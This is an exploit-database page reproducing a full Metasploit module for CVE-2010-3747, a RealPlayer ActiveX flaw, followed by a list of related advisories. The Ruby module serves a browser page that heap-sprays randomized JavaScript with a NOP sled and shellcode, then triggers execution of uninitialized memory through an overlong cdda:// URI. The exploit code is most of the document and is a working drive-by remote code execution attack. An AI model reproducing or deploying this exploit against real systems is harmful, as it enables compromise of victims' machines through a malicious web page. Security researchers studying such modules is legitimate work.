Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMetasploit1337DAY-ID-15635
HistoryMar 18, 2011 - 12:00 a.m.

RealNetworks RealPlayer CDDA URI Initialization Vulnerability

2011-03-1800:00:00
metasploit
0day.today
28
JSON

Exploit for windows platform in category remote exploits

##
# $Id: realplayer_cdda_uri.rb 12009 2011-03-17 15:42:28Z bannedit $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::Remote::HttpServer::HTML
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'RealNetworks RealPlayer CDDA URI Initialization Vulnerability',
            'Description'    => %q{
                    This module exploits a initialization flaw within RealPlayer 11/11.1 and
                RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object
                initialization failure. However, this failure is improperly handled and
                uninitialized memory executed.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'bannedit',
                    'sinn3r'
                ],
            'Version'        => '$Revision: 12009 $',
            'References'     =>
                [
                    [ 'CVE', '2010-3747' ],
                    [ 'OSVDB', '68673'],
                    [ 'BID', '44144' ],
                    [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-210/'],
                    [ 'URL', 'http://service.real.com/realplayer/security/10152010_player/en/']
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'    => 1000,
                    'BadChars' => "\x00",
                },
            'Platform' => 'win',
            'Targets'        =>
                [
                    [ 'RealPlayer SP 1.0 - 1.1.4 Universal',     { 'Ret' => 0x21212121 } ],
                    [ 'RealPlayer 11.0 - 11.1 Universal',        { 'Ret' => 0x21212121 } ],
                ],
            'Privileged'     => false,
            'DisclosureDate' => 'Nov 15 2010',
            'DefaultTarget'  => 0))
    end
 
    def on_request_uri(cli, request)
        # Re-generate the payload
        return if ((p = regenerate_payload(cli)) == nil)
 
        mytarget = target
 
        # the ret slide gets executed via call [esi+45b]
        retslide = [mytarget.ret].pack('V') * 750
        cdda_uri = "cdda://" +  retslide
 
        # Encode the shellcode
        shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
        nops = make_nops(8)
        nop_sled = Rex::Text.to_unescape(nops, Rex::Arch.endian(target.arch))
 
        # Randomize Javascript variables
        var_blocks    = rand_text_alpha(rand(6)+3)
        var_shellcode = rand_text_alpha(rand(6)+3)
        var_index     = rand_text_alpha(rand(6)+3)
        var_nopsled   = rand_text_alpha(rand(6)+3)
        spray_func    = rand_text_alpha(rand(6)+3)
        obj_id        = rand_text_alpha(rand(6)+3)
        html = <<-EOS
<html>
<head>
<script>
function #{spray_func}() {
    #{var_blocks} = new Array();
    var #{var_shellcode} = unescape("#{shellcode}");
    var #{var_nopsled} = unescape("#{nop_sled}");
    do { #{var_nopsled} += #{var_nopsled} } while (#{var_nopsled}.length < 8200);
        for (#{var_index}=0; #{var_index} < 19000; #{var_index}++)
            #{var_blocks}[#{var_index}] = #{var_nopsled} + #{var_shellcode};
    }
#{spray_func}();
</script>
</head>
<object id=#{obj_id} classid='clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA' width=0 height=0>
<param name="CONTROLS" value="ControlPanel">
<param name="src" value="#{cdda_uri}">
</object>
<script language="VBScript">
#{obj_id}.DoPlay
</script>
</html>
EOS
        print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}")
        send_response(cli, html, { 'Content-Type' => 'text/html' })
    end
end



#  0day.today [2018-02-02]  #

Related

cve 1
cvelist 1
metasploit 1
saint 4
prion 1
exploitdb 1
nvd 1
checkpoint_advisories 2
d2 1
zdi 1
packetstorm 1
nessus 3
openvas 2
cve
cve
CVE-2010-3747
2010-10-19 00:00:01
cvelist
cvelist
CVE-2010-3747
2010-10-18 22:00:00
metasploit
metasploit
RealNetworks RealPlayer CDDA URI Initialization Vulnerability
2011-03-17 15:42:28
saint
saint
RealNetworks RealPlayer CDDA URI Uninitialized Pointer Code Execution
2010-10-22 00:00:00
RealNetworks RealPlayer CDDA URI Uninitialized Pointer Code Execution
2010-10-22 00:00:00
RealNetworks RealPlayer CDDA URI Uninitialized Pointer Code Execution
2010-10-22 00:00:00
prion
prion
Null pointer dereference
2010-10-19 00:00:00
exploitdb
exploitdb
RealNetworks RealPlayer - CDDA URI Initialization (Metasploit)
2011-03-17 00:00:00
nvd
nvd
CVE-2010-3747
2010-10-19 00:00:01
checkpoint_advisories
checkpoint_advisories
RealNetworks RealPlayer CDDA URI Uninitialized Pointer Code Execution (CVE-2010-3747)
2010-10-28 00:00:00
RealPlayer CDDA URI Code Execution - Ver2 (CVE-2010-3747)
2014-01-28 00:00:00
d2
d2
DSquare Exploit Pack: D2SEC_CDDAURI
2010-10-19 00:00:00
zdi
zdi
RealNetworks RealPlayer ActiveX Control CDDA URI Uninitialized Pointer Remote Code Execution Vulnerability
2010-10-15 00:00:00
packetstorm
packetstorm
RealNetworks RealPlayer CDDA URI Initialization Vulnerability
2011-03-18 00:00:00
nessus
nessus
RealPlayer Enterprise for Windows < Build 6.0.12.1823 Multiple Vulnerabilities
2010-10-19 00:00:00
Real Networks RealPlayer SP < 1.1.5 Multiple Vulnerabilities
2010-08-27 00:00:00
RealPlayer for Windows < Build 12.0.0.879 Multiple Vulnerabilities
2010-08-27 00:00:00
openvas
openvas
RealNetworks RealPlayer Multiple Vulnerabilities (Windows) - Dec10
2010-12-29 00:00:00
RealNetworks RealPlayer Multiple Vulnerabilities (Dec 2010) - Windows
2010-12-29 00:00:00
JSON
Related for 1337DAY-ID-15635
cve1cvelist1metasploit1saint4prion1exploitdb1nvd1checkpoint_advisories2d21zdi1packetstorm1nessus3openvas2